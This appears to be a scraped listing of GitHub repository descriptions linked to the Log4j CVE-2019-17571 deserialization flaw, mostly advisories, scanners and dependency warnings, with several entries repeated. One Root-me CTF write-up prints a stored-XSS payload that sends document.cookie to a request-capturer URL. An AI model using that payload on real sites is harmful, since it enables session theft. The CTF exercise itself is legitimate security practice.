CVE-2019-17571

log4j output in JSON format

Deprecated According to Apache log4j "A security vulnerability, CVE-2019-17571 has been identified against Log4j 1 Log4j includes a SocketServer that accepts serialized log events and deserializes them without verifying whether the objects are allowed or not This can provide an attack vector that can be expoited Since Log4j 1 is no longer maintained this issue will not

Hello World for Apache Wicket 6310-SNAPSHOT This is a simple hello world project for the Apachet Wicket web application framework Clone this and do the steps from 1,2,3 and you should see a hello world appear Note that this runs on a jetty server instead of a tomcat or other server IDE best used for this project is Eclipse 2020+ How to use? Clone this and import import t

Compiling links of value i find regarding CVE-2021-44228

l4j-info Compiling valuable links as I find them documenting CVE-2021-44228 or Log4J Critical First Party advisories: Existing Log4J 12 vulnerability CVE-2019-17571 is also potentially present Apache Log4J Version 2x Security Information VMWare critical vulnerability advisory Cisco product vulnerability announcement Sophos products affected Microsoft’s response to CVE-

Apache POI for JPHP! WARNING this product use Log4J Package from maven (Apache Log4j Core » 2171) Vulnerabilities from dependencies: CVE-2021-42550 CVE-2021-4104 CVE-2021-23463 CVE-2019-17571

Hello World for Apache Wicket 6310-SNAPSHOT This is a simple hello world project for the Apachet Wicket web application framework Clone this and do the steps from 1,2,3 and you should see a hello world appear Note that this runs on a jetty server instead of a tomcat or other server IDE best used for this project is Eclipse 2020+ How to use? Clone this and import import t

Exploring an approach to inserting and tracking code fix markers in binaries.

Fix-Signature Tracking (FixSigTrack) Exploring an approach to inserting and tracking code fix markers in binaries This is an exploration of using the yara (virustotalgithubio/yara/) tool as a mechanism to articulate "rules" for identification of "signature" markers associated with code fixes Product Security Advisories may be issued in response

Apache Log4j 1.2.X存在反序列化远程代码执行漏洞

CVE-2019-17571/Apache Log4j 12X存在反序列化远程代码执行漏洞 漏洞预警参考链接： mpweixinqqcom/s/okU2y0izfnKXXtXG3EfLkQ 1 漏洞描述 Apache Log4j是美国阿帕奇（Apache）软件基金会的一款基于Java的开源日志记录工具Apache Log4j 12X系列版本中存在反序列化远程代码执行漏洞攻击者可利用该漏洞执

A free open-source point-of-sale application for restaurants (and potentially more) UPDATED FROM SVN SOURCE -> 7-3-22 (the rest is up to you...)

FloreantPOS Update 7-3-22: Version bumps to postgresql, mysql-connector-java, & derby (security from @dependabot) Also some changes to make build complete Update 2-28-22: Updated xercesImpl from 2120 to 2122 Update 1-3-22: Updated log4j-core to 2171 due to log4shell vulnerability Update 3-11-21: Quick note: Apparently FloreantPOS's LICENSE's web l

Root-me & CTFlearn Challenges

1 Web application vulnerabilities XSS Stored 1 Steps to reproduce - Create a free request capturer @ pipedreamcom - Start event listening at the request capturer - Visit challenge01root-meorg/web-client/ch18/ - Choose any title - Enter <script>documentwrite("<img src=request_capturer_url"+documentcookie+"/>");

A scanning tool to check if the system is vuln and report it to the log4j-collector

log4j-scanner A scanning tool to check if the system is vuln and report it to the log4j-collector which will display the data at the log4j-collector-frontend Collecting data log4j-collector (HTTP REST API) log4j-collector-frontend (Web UI) Algorithm Author This tool is based on the local-log4j-vuln-scanner from Hillu (Leave a star to support him) Introduction This is

OPEN HTML TO PDF OVERVIEW Open HTML to PDF is a pure-Java library for rendering arbitrary well-formed XML/XHTML (and even HTML5) using CSS 21 for layout and formatting, outputting to PDF or images Use this library to generated nice looking PDF documents But be aware that you can not throw modern HTML5+ at this engine and expect a great result You must special craft the HTML

Hello World with Apache Wicket

Hello World for Apache Wicket 6310-SNAPSHOT This is a simple hello world project for the Apachet Wicket web application framework Clone this and do the steps from 1,2,3 and you should see a hello world appear Note that this runs on a jetty server instead of a tomcat or other server IDE best used for this project is Eclipse 2020+ How to use? Clone this and import import t

An HTML to PDF library for the JVM. Based on Flying Saucer and Apache PDF-BOX 2. With SVG image support. Now also with accessible PDF support (WCAG, Section 508, PDF/UA)!

OPEN HTML TO PDF OVERVIEW Open HTML to PDF is a pure-Java library for rendering a reasonable subset of well-formed XML/XHTML (and even some HTML5) using CSS 21 (and later standards) for layout and formatting, outputting to PDF or images Use this library to generated nice looking PDF documents But be aware that you can not throw modern HTML5+ at this engine and expect a grea

Log4j RELP Plugin

Log4j RELP Plugin Creates Log4j appender that uses RELP to ensure no events are lost See log4jexampleproperties for example config Please note Please note that regarding log4j version 1217 following vulnerabilities exist and we recommend not to use these features: CVE-2020-9488 Improper validation of certificate with host mismatch in Apache Log4j SMTP a

Clone do repositório https://github.com/HenriqueDataTransp/Jasper-Starter.git

JasperStarter - Running JasperReports from command line JasperStarter is an opensource command line launcher and batch compiler for JasperReports The official homepage is jasperstatercenotede JasperStarter is not vulnerable to CVE-2021-44228 But all releases including 350 contain log4j-1217 which is affected by CVE-2019-17571 I cannot say if it is possible to exploit

JasperStarter - Running JasperReports from command line JasperStarter is an opensource command line launcher and batch compiler for JasperReports The official homepage is jasperstatercenotede JasperStarter is not vulnerable to CVE-2021-44228 But all releases including 350 contain log4j-1217 which is affected by CVE-2019-17571 I cannot say if it is possible to exploit

Fast filesystem scanner for CVE-2021-44228

Filesystem log4j_scanner for windows and Unix Scanning for CVE-2021-44228, CVE-2021-45046, CVE-2019-17571, CVE-2021-44832 Requires a minimum of Python 27 Can be executed as Custom Script Rule of an Audit or via a Server Script with Server Automation Also executable standalone from the command line Reference githubcom/hillu/local-log4j-vuln-scanner/ github

JasperStarter - Running JasperReports from command line (This is just a mirror - see bitbucket.org/cenote/jasperstarter)

JasperStarter - Running JasperReports from command line JasperStarter is an opensource command line launcher and batch compiler for JasperReports The official homepage is jasperstatercenotede JasperStarter is not vulnerable to CVE-2021-44228 But all releases including 350 contain log4j-1217 which is affected by CVE-2019-17571 I cannot say if it is possible to exploit